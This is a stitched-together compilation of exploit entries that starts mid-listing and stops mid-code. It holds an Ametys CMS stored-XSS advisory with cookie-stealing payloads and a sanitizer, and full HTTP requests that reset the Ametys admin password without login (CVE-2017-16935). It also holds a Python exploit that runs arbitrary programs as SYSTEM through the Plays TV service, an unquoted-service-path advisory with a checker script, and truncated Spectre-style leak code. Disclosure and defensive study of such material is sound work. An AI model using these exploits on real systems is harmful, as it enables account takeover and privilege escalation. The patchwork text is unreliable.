                                         BUILTIN\Administrators:(I)(F)
                                         BUILTIN\Users:(I)(RX)
Elaborazione completata per 1 file.
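The listing above shows Authenticated Users holding (M) on the service binary, which is what lets a standard user replace it. An added example (not from the advisory) that parses icacls output for a known file and flags ACEs granting write-capable rights to low-privilege principals; the principal and rights tables are my assumptions, and the sample is the page's listing laid out the way icacls prints it (one ACE per line, continuation lines indented).

```python
import re

# icacls rights abbreviations that let the holder replace or alter the file.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "WDAC", "WO", "DC"}
# Inheritance/propagation flags, not rights.
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Principals that should never hold write rights on a service binary (assumed list).
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users", "Everyone", "NT AUTHORITY\\INTERACTIVE",
}
# One ACE as icacls prints it: PRINCIPAL:(flag)(flag)...
ACE_LINE = re.compile(r"^(?P<principal>[^:()]+):(?P<mask>(?:\([^)]*\))+)$")


def parse_icacls(output: str, path: str) -> list:
    """Return [(principal, [flags...]), ...] for the ACEs icacls printed for `path`."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):              # first line carries the path before the first ACE
            line = line[len(path):].strip()
        m = ACE_LINE.match(line)
        if m:
            flags = re.findall(r"\(([^)]*)\)", m.group("mask"))
            aces.append((m.group("principal"), flags))
    return aces


def weak_aces(aces: list) -> list:
    """ACEs that grant write-capable rights to a low-privilege principal."""
    findings = []
    for principal, flags in aces:
        if "DENY" in flags:
            continue
        rights = set()
        for f in flags:
            rights.update(f.split(","))        # compound masks look like (RX,W)
        rights -= INHERITANCE_FLAGS
        granted = sorted(rights & WRITE_RIGHTS)
        if principal in LOW_PRIV_PRINCIPALS and granted:
            findings.append((principal, granted))
    return findings


# The page's listing, laid out as icacls prints it (constructed indentation).
AMICA_ICACLS = (
    "C:\\AmicaProdigy\\RemoteBackup.Service.exe NT AUTHORITY\\Authenticated Users:(I)(M)\n"
    "                                         NT AUTHORITY\\SYSTEM:(I)(F)\n"
    "                                         BUILTIN\\Administrators:(I)(F)\n"
    "                                         BUILTIN\\Users:(I)(RX)\n"
    "Elaborazione completata per 1 file.\n"
)

if __name__ == "__main__":
    aces = parse_icacls(AMICA_ICACLS, "C:\\AmicaProdigy\\RemoteBackup.Service.exe")
    for principal, granted in weak_aces(aces):
        print(f"WEAK: {principal} holds {granted}")
```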
# Exploit Title: Ametys CMS v4.4.1 - Cross Site Scripting (XSS)
# Exploit Author: Vulnerability-Lab
# Date: 21/01/2022
Document Title:
===============
Ametys v4.4.1 CMS - Cross Site Scripting Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2275
Release Date:
=============
2022-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
2275
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Build powerful and stunning websites. Whether you need an advanced corporate website, a powerful landing page, a professional blog or
an event website, all the tools to make creative digital experiences are at your fingertips with Ametys. No coding skills needed.
Ametys makes it easy for everyone to create and manage a unified digital platform. Ametys delivers a simple and intuitive interface with
a familiar Office-style ribbon.
(Copy of the Homepage: https://www.ametys.org/community/en/ametys-platform/ametys-portal/overview.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the Ametys v4.4.1 cms web-application.
Affected Product(s):
====================
Ametys
Product: Ametys v4.4.1 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-07-24: Researcher Notification & Coordination (Security Researcher)
2021-07-25: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-01-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Ametys v4.4.1 cms web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise
browser-to-web-application requests from the application side.
The vulnerability is located in the link text, small description and description input fields of the add external link function.
The function is for example located in the link directory of the backend. Added links are listed with status and details.
Attackers with low privileges are able to add their own malformed link with malicious script code in the marked vulnerable parameters.
After the injection the links are displayed in the backend, where the execution takes place on preview of the main link directory.
The attack vector of the vulnerability is persistent and the request method to inject is POST.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
to malicious sources and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Link Directory (Add)
Vulnerable Function(s):
[+] add (External Link)
Vulnerable Parameter(s):
[+] Link Text
[+] Small description
[+] Description
Affected Module(s):
[+] Frontend (Main Link Listing)
[+] Backend (Link Directory)
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with low-privileged user accounts and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the application path and log in to the service as a restricted user that is allowed to create links
2. Open the link directory and create a new link (top|left)
3. Inject the test payloads into the link text, small description and description fields and save via POST
4. On visiting the link directory, the payloads execute in the backend listing or frontend
5. Successful reproduction of the persistent web vulnerability!
Payload(s):
<a onmouseover=alert(document.domain)>poc_link</a>
<a onmouseover=alert(document.cookie)>poc_link</a>
Vulnerable Source: Link Directory - Link (Add)
class="x-grid-cell-inner " style="text-align:left;"
<a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7478 x-unselectable"
style="width: 248px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7478"><div unselectable="on" class="x-grid-cell-inner "
style="text-align:left;"><a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7479
x-unselectable" style="width: 247px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7479"><div unselectable="on" class="x-grid-cell-inner "
style="text-align:left;"> </div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7480 x-grid-cell-last x-unselectable" style="width:
148px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7480"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;">
</div></td></tr></tbody></table><table id="tableview-7474-record-105" role="presentation" data-boundview="tableview-7474" data-recordid="105"
data-recordindex="1" class="x-grid-item x-grid-item-selected x-grid-item-alt" style=";width:0" cellspacing="0" cellpadding="0"><tbody><tr class="
x-grid-row" role="row"><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7475 x-grid-cell-first x-unselectable" style="width: 396px;"
role="gridcell" tabindex="-1" data-columnid="gridcolumn-7475"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;">
<span class="a-grid-glyph ametysicon-link23"></span>test.de</div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7476 x-unselectable"
style="width: 149px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7476"><div unselectable="on" class="x-grid-cell-inner "
style="text-align:left;">Normal</div></td>
--- PoC Session Logs (POST) ---
https://ametys.localhost:8000.localhost:8000/cms/plugins/core-ui/servercomm/messages.xml
Host: ametys.localhost:8000.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1197812616356669894551519312
Content-Length: 798
Origin: https://ametys.localhost:8000.localhost:8000
Connection: keep-alive
Referer: https://ametys.localhost:8000.localhost:8000/cms/www/index.html
Cookie: JSESSIONID=A1DC067A1739FDFBC72BCF921A5AA655;
AmetysAuthentication=YW1ldHlzX2RlbW9fdXNlcnMjd2VibWFzdGVyI1A5WndHNTNzNmJhYlRWSDI;
JSESSIONID=A0EC6E56FC3A2131C9D24C33CB9CCAAA
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
content={"0":{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-announcement/view.xml"},"1":
{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-startuptime.xml"}}&context.parameters=
{"siteName":"www","skin":"demo","debug.mode":"false","populationContexts":["/sites/www","/sites-fo/www"],"user":
{"login":"testuser_restricted","population":"ametys_demo_users","firstname":"testuser_restricted","lastname":"User","fullname":"testuser_restricted User",
"email":"testuser_restricted@test.com","populationLabel":"Ametys Demo Users","locale":"en"}}
-
POST: HTTP/1.1 200
Server: Apache/2.4.29 (Ubuntu)
X-Cocoon-Version: 2.1.13
Ametys-Dispatched: true
Content-Type: text/xml
Via: 1.1 ametys.localhost:8000.localhost:8000
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: fr
Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the input fields in the external link add function of the link directory.
In a second step the input fields can be restricted for special characters to prevent further attacks.
As a next step, the output locations where the links are displayed (frontend & backend) should be sanitized correctly.
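One way to apply the fix described in this section, added here as an example and not Ametys code: an allowlist sanitizer for the link text and description fields that keeps only a few harmless tags, drops every `on*` attribute and any `href` outside http/https/mailto or a site-relative path, and escapes everything else, so the `<a onmouseover=...>` payloads above come out inert. The tag allowlist and scheme list are assumptions.

```python
import html
from html.parser import HTMLParser

# Tags a link description may legitimately contain, with the attributes allowed on each.
ALLOWED_TAGS = {"a": {"href", "title"}, "b": set(), "i": set(), "em": set(), "strong": set(), "br": set()}
# Only these href prefixes survive; javascript:, data:, vbscript: etc. are dropped.
SAFE_HREF_PREFIXES = ("http://", "https://", "mailto:", "/")


class LinkFieldSanitizer(HTMLParser):
    """Rebuilds the input from parsed tokens, keeping only allowlisted tags/attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # tag discarded; its text content is still emitted via handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag]:
                continue  # this is where onmouseover=, onclick=, style= ... are dropped
            value = value or ""
            if name == "href" and not value.strip().lower().startswith(SAFE_HREF_PREFIXES):
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag != "br":
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open_tags:
            while self.open_tags:  # close everything up to and including this tag
                closed = self.open_tags.pop()
                self.out.append("</%s>" % closed)
                if closed == tag:
                    break

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        while self.open_tags:  # close anything the input left open
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_link_field(raw: str) -> str:
    parser = LinkFieldSanitizer()
    parser.feed(raw)
    parser.close()
    return parser.result()


if __name__ == "__main__":
    # The two payloads from the advisory above, and one normal link.
    for sample in ('<a onmouseover=alert(document.domain)>poc_link</a>',
                   '<a onmouseover=alert(document.cookie)>poc_link</a>',
                   '<a href="https://example.org" title="ok">fine</a>'):
        print(sanitize_link_field(sample))
```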
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the ametys web-application cms is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to ask for permission.
Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
## Vulnerability Summary
The following advisory describes a password reset vulnerability found in Ametys CMS version 4.0.2.
Ametys is “a free and open source content management system (CMS) written in Java. It is based on JSR-170 for content storage, Open Social for gadget rendering and a XML oriented framework.”
## Credit
An independent security researcher, Jose Luis, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
## Vendor response
Ametys has released patches to address this vulnerability – Ametys version 4.0.3
For more details: https://issues.ametys.org/browse/RUNTIME-2582
CVE-2017-16935
## Vulnerability details
User controlled input is not sufficiently sanitized. An unauthenticated user can perform administrative operations without proper authorization.
Ametys CMS only enforces the authorization check when the request path contains /cms/; the same server-communication endpoint reached outside that prefix is not checked.
As a result, the password of any user can be reset, including administrator accounts.
## Proof of Concept
By sending the following POST request, we can obtain the list of users:
```
POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1
Host: 192.168.196.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.196.128:8080/cms/www/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 213
Cookie: JSESSIONID=
Connection: close
content={"0":{"pluginOrWorkspace":"core","responseType":"text","url":"users/search.json","parameters":{"contexts":["/sites/www","/sites-fo/www"],"criteria":"","limit":100,"page":1,"start":0}}}}&context.parameters={}
```
The server then responds with:
```
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Cocoon-Version: 2.1.13-dev
Content-Type: text/xml
Date: Tue, 03 Oct 2017 13:52:15 GMT
Connection: close
Content-Length: 1875
<?xml version="1.0" encoding="UTF-8"?><responses><response id="0" code="200" duration="946">{"users":[{"firstname":"Simple","sortablename":"Contributor Simple","populationLabel":"Ametys Demo Users","populationId":"ametys_demo_users","fullname":"Simple Contributor","login":"contrib","directory":"SQL database","email":"contrib@example.com","lastname":"Contributor"},{"firstname":"User1","sortablename":"User1 User1","populationLabel":"FO Demo Users","populationId":"fo-demo-users","fullname":"User1 User1","login":"user1@ametys.org","directory":"SQL database","email":"user1@ametys.org","lastname":"User1"},{"firstname":"User3","sortablename":"User3 User3","populationLabel":"FO Demo Users","populationId":"fo-demo-users","fullname":"User3 User3","login":"user3@ametys.org","directory":"SQL database","email":"user3@ametys.org","lastname":"User3"},{"firstname":"Webmaster","sortablename":"User Webmaster","populationLabel":"Ametys Demo Users","populationId":"ametys_demo_users","fullname":"Webmaster User","login":"webmaster","directory":"SQL database","email":"webmaster@example.com","lastname":"User"},{"firstname":"Manager","sortablename":"User Manager","populationLabel":"Ametys Demo Users","populationId":"ametys_demo_users","fullname":"Manager User","login":"manager","directory":"SQL database","email":"manager@example.com","lastname":"User"},{"firstname":"Administrator","sortablename":"User Administrator","populationLabel":"Ametys Demo Users","populationId":"ametys_demo_users","fullname":"Administrator User","login":"admin","directory":"SQL database","email":"admin@example.com","lastname":"User"},{"firstname":"User2","sortablename":"User2 User2","populationLabel":"FO Demo Users","populationId":"fo-demo-users","fullname":"User2 User2","login":"user2@ametys.org","directory":"SQL database","email":"user2@ametys.org","lastname":"User2"}]}</response></responses>
```
We need the values of the “populationId” and “login” fields for the next request.
Now we send another request to change the password of the admin user:
```
POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1
Host: 192.168.196.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.196.128:8080/cms/www/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 345
Cookie: JSESSIONID=
Connection: close
content={"0":{"pluginOrWorkspace":"core-ui","responseType":"text","url":"client-call","parameters":{"role":"org.ametys.plugins.core.user.UserDAO","methodName":"editUser","parameters":["ametys_demo_users",{"login":"admin","password":"MYNEWPASSWORD","firstname":"Administrator","lastname":"User","email":"admin@example.com"}]}}}&context.parameters={}
```
Once we have performed the request, the response is:
```
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Cocoon-Version: 2.1.13-dev
Content-Type: text/xml
Date: Tue, 03 Oct 2017 13:52:59 GMT
Connection: close
Content-Length: 374
<?xml version="1.0" encoding="UTF-8"?><responses><response id="0" code="200" duration="110">{"firstname":"Administrator","sortablename":"User Administrator","populationLabel":"Ametys Demo Users","populationId":"ametys_demo_users","fullname":"Administrator User","login":"admin","directory":"SQL database","email":"admin@example.com","lastname":"User"}</response></responses>
```
Now you can log in as admin with the password MYNEWPASSWORD.
########################################################################
# http://support.amd.com/en-us/download?cmpid=CCCOffline -
# Click "Automatically Detect - Download Now"
# Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
# OR
#
# https://plays.tv/download
#
# Target OS: Windows( Any )
# Privilege: SYSTEM
# Type: Arbitrary File Execution
#
# Notes: Second minor bug allows for arbitrary file write of
# uncontrolled data using the /extract_files path.
#
########################################################################
#!/usr/bin/python3
import urllib.request
import urllib.parse
import urllib.error
import json
import hashlib

def check_svc( path, data ):
    # Fingerprint the service: a POST without the 'hash' field makes a
    # Plays TV service answer with a distinctive error message.
    # 'addr' is the module-level target URL built below.
    request = urllib.request.Request(addr)
    #add post data
    try:
        resp = urllib.request.urlopen(request, "data".encode("utf-8"))
        return "[-] Not Raptr, Plays TV service"
    except urllib.error.HTTPError as err:
        error_message = err.read().decode("utf-8")
        if error_message == 'Security failed - Missing hash or message[data]':
            return "[+] Raptr, Plays TV service"
        return "[-] Unexpected error: " + error_message

def post_req( path, data ):
    secret_key = 'a%qs0t33QgiE6ut^0I&Y'
    #Setup request
    request = urllib.request.Request(addr)
    json_data = json.dumps(data)
    # The service authenticates requests with md5(path + json + hard-coded secret)
    m = hashlib.md5()
    hash_data = path + json_data + secret_key
    m.update(hash_data.encode('utf8'))
    hash_str = m.hexdigest()
    #add post data
    p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
    resp = urllib.request.urlopen(request, p_data)
    return resp.read()

#Target IP address
ip = '127.0.0.1'
##############################################################
# The service binds to an ephemeral port defined at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]
##############################################################
port = 50452
##############################################################
# The service calls CreateProcess with the following format:
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
#
# One way of achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution
data = {
    "installer": cmd,
    "appdata": cmd
}
#Set url
path = '/execute_installer'
addr = 'http://' + ip + ':' + str(port) + path
#Check if the remote service is a Raptr Plays TV svc
#ret = check_svc(path, data)
#print(ret)
#Exploit service
ret = post_req(path, data)
print(ret)
# Exploit Title: AMD Fuel Service - 'Fuel.service' Unquote Service Path
# Discovery by: Hector Gerbacio
# Discovery Date: 2021-02-05
# Vendor Homepage: https://www.amd.com/
# Tested Version: 1.0.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 8.1 with Bing
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\WINDOWS\\" | findstr /i "fuel.service" | findstr /i /v """
AMD FUEL Service AMD FUEL Service C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe /launchService Auto
# Service info:
C:\>sc qc "AMD FUEL Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AMD FUEL Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe /launchService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AMD FUEL Service
DEPENDENCIES : RpcSs
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
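The check a practitioner wants after the `sc qc` output above is which files CreateProcess would actually look for before it reaches `Fuel.Service.exe`, and whether any of those locations is writable. The script below is an added example, not part of the advisory: it extracts the image path from `sc qc` text (the English `BINARY_PATH_NAME` label or the Spanish `NOMBRE_RUTA_BINARIO` label the advisory was captured with), applies the documented CreateProcess lookup rule (split at each space, append `.exe` to a fragment without an extension), and reports which candidate directories the current user can write to. The embedded `sc qc` text is a copy of the advisory's output; the writability check uses `os.access()` and is only meaningful when run on the affected host.

```python
"""Candidate hijack locations for an unquoted Windows service path.

Added example, not from the advisory. Parsing runs anywhere; the
directory writability check only says something on the Windows host.
"""
import ntpath
import os
import sys

# Label of the image-path line in `sc qc` output: English, and the Spanish
# locale the advisory was captured on.
SC_PATH_KEYS = ("BINARY_PATH_NAME", "NOMBRE_RUTA_BINARIO")

# `sc qc "AMD FUEL Service"` output from the advisory, used as default input.
FUEL_SC_OUTPUT = """\
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AMD FUEL Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files\\ATI Technologies\\ATI.ACE\\Fuel\\Fuel.Service.exe /launchService
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc(sc_output):
    """Image path from `sc qc` text; the first colon separates label and value."""
    for line in sc_output.splitlines():
        label, sep, value = line.partition(":")
        if sep and label.strip().upper() in SC_PATH_KEYS:
            return value.strip()
    raise ValueError("no BINARY_PATH_NAME line found in sc qc output")


def split_unquoted(image_path):
    """Return (paths tried before the real binary, real binary).

    A quoted path is not affected. For an unquoted one, every space-delimited
    prefix is a lookup candidate until the first fragment ending in .exe, which
    is taken to be the real binary (anything after it is service arguments).
    """
    if image_path.startswith('"'):
        return [], image_path[1:].split('"', 1)[0]
    parts = image_path.split(" ")
    tried = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            return tried, prefix
        # CreateProcess appends .exe when the fragment has no extension
        if not ntpath.splitext(ntpath.basename(prefix))[1]:
            prefix += ".exe"
        tried.append(prefix)
    return tried, None


def writable_hijack_points(candidates):
    """Candidates whose parent directory exists and is writable by this user."""
    hits = []
    for cand in candidates:
        parent = ntpath.dirname(cand)
        if os.path.isdir(parent) and os.access(parent, os.W_OK):
            hits.append(cand)
    return hits


def main(argv):
    # `-` reads `sc qc` output from stdin; otherwise the advisory's text is used
    text = sys.stdin.read() if argv[1:] == ["-"] else FUEL_SC_OUTPUT
    image = binary_path_from_sc(text)
    tried, real = split_unquoted(image)
    print("image path : %s" % image)
    print("real binary: %s" % real)
    writable = set(writable_hijack_points(tried))
    for cand in tried:
        print("  %-8s %s" % ("WRITABLE" if cand in writable else "-", cand))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

On the host, `sc qc "AMD FUEL Service" | python unquoted.py -` prints `C:\Program.exe` and `C:\Program Files\ATI.exe` as the two locations tried before the real binary; on a default install neither parent directory is writable by a standard user, which is the caveat behind the advisory's "would require the local user to be able to insert their code" wording.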
/*
======== Intro / Overview ========
After Michael Schwarz made some interesting observations, we started
looking into variants other than the three already-known ones.
I noticed that Intel's Optimization Manual says in
section 2.4.4.5 ("Memory Disambiguation"):
A load instruction micro-op may depend on a preceding store. Many
microarchitectures block loads until all preceding store address
are known.
The memory disambiguator predicts which loads will not depend on
any previous stores. When the disambiguator predicts that a load
does not have such a dependency, the load takes its data from the
L1 data cache.
Eventually, the prediction is verified. If an actual conflict is
detected, the load and all succeeding instructions are re-executed.
According to my experiments, this effect can be used to cause
speculative execution to continue far enough to execute a
Spectre-style gadget on a pointer read from a memory slot to which a
store has been speculatively ignored. I have tested this behavior on
the following processors from Intel and AMD:
- Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz [Skylake laptop]
- AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G [AMD desktop]
- Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz [Haswell desktop]
I haven't yet tested this on any ARM CPU.
Interestingly, only on the Skylake laptop, it seems to work when
interrupts and SMP are disabled while the test is running; on the
other machines, it seems to only work when interrupts are enabled,
maybe because the kernel code causes some noise that garbles some
predictor state or so? Or just because they mess up timing
somewhere...
There were mentions of data speculation on the netdev list, in a
somewhat different context:
https://www.mail-archive.com/netdev@vger.kernel.org/msg212262.html
https://www.mail-archive.com/netdev@vger.kernel.org/msg215369.html
However, I'm not entirely sure about the terminology. Do
"data speculation" and "value speculation" include speculating about
the *source* of data, or do they refer exclusively to directly
speculating about the *value* of data?
======== Demo code (no privilege boundaries crossed) ========
This is some code that purely demonstrates the basic effect and shows
that it is possible to combine it with a Meltdown/Spectre-style
gadget for leaking data into the cache. It does not cross any
privilege boundaries.
----------------------- START -----------------------
// compile with: gcc -o test test.c -Wall -DHIT_THRESHOLD={CYCLES}
// optionally add: -DNO_INTERRUPTS
#include <stdio.h>
#include <sys/io.h>
#include <err.h>
#include <sys/mman.h>

#define pipeline_flush() asm volatile("mov $0, %%eax\n\tcpuid\n\tlfence" : /*out*/ : /*in*/ : "rax","rbx","rcx","rdx","memory")
#define clflush(addr) asm volatile("clflush (%0)"::"r"(addr):"memory")

// source of high-latency pointer to the memory slot
unsigned char **flushy_area[1000];
#define flushy (flushy_area+500)

// memory slot on which we want bad memory disambiguation
unsigned char *memory_slot_area[1000];
#define memory_slot (memory_slot_area+500)

//                                 0123456789abcdef
unsigned char secret_read_area[] = "0000011011101011";
unsigned char public_read_area[] = "################";

unsigned char timey_line_area[0x200000];
// stored in the memory slot first
#define timey_lines (timey_line_area + 0x10000)

unsigned char dummy_char_sink;

int testfun(int idx) {
  pipeline_flush();
  *flushy = memory_slot;
  *memory_slot = secret_read_area;
  timey_lines['0' << 12] = 1;
  timey_lines['1' << 12] = 1;
  pipeline_flush();
  clflush(flushy);
  clflush(&timey_lines['0' << 12]);
  clflush(&timey_lines['1' << 12]);
  asm volatile("mfence");
  pipeline_flush();

  // START OF CRITICAL PATH
  unsigned char **memory_slot__slowptr = *flushy;
  //pipeline_flush();
  // the following store will be speculatively ignored since its
  // address is unknown
  *memory_slot__slowptr = public_read_area;
  // uncomment the instructions in the next line to break the attack
  asm volatile("" /*"mov $0, %%eax\n\tcpuid\n\tlfence"*/ : /*out*/ : /*in*/ : "rax","rbx","rcx","rdx","memory");
  // architectural read from dummy_timey_line, possible
  // microarchitectural read from timey_line
  dummy_char_sink = timey_lines[(*memory_slot)[idx] << 12];
  // END OF CRITICAL PATH

  unsigned int t1, t2;
  pipeline_flush();
  asm volatile(
    "lfence\n\t"
    "rdtscp\n\t"
    "mov %%eax, %%ebx\n\t"
    "mov (%%rdi), %%r11\n\t"
    "rdtscp\n\t"
    "lfence\n\t"
    ://out
    "=a"(t2),
    "=b"(t1)
    ://in
    "D"(timey_lines + 0x1000 * '0')
    ://clobber
    "r11",
    "rcx",
    "rdx",
    "memory"
  );
  pipeline_flush();
  unsigned int delay_0 = t2 - t1;

  pipeline_flush();
  asm volatile(
    "lfence\n\t"
    "rdtscp\n\t"
    "mov %%eax, %%ebx\n\t"
    "mov (%%rdi), %%r11\n\t"
    "rdtscp\n\t"
    "lfence\n\t"
    ://out
    "=a"(t2),
    "=b"(t1)
    ://in
    "D"(timey_lines + 0x1000 * '1')
    ://clobber
    "r11",
    "rcx",
    "rdx",
    "memory"
  );
  pipeline_flush();
  unsigned int delay_1 = t2 - t1;

  if (delay_0 < HIT_THRESHOLD && delay_1 > HIT_THRESHOLD) {
    pipeline_flush();
    return 0;
  }
  if (delay_0 > HIT_THRESHOLD && delay_1 < HIT_THRESHOLD) {
    pipeline_flush();
    return 1;
  }
  pipeline_flush();
  return -1;
}

int main(void) {
  char out[100000];
  char *out_ = out;
#ifdef NO_INTERRUPTS
  if (mlockall(MCL_CURRENT|MCL_FUTURE) || iopl(3))
    err(1, "iopl(3)");
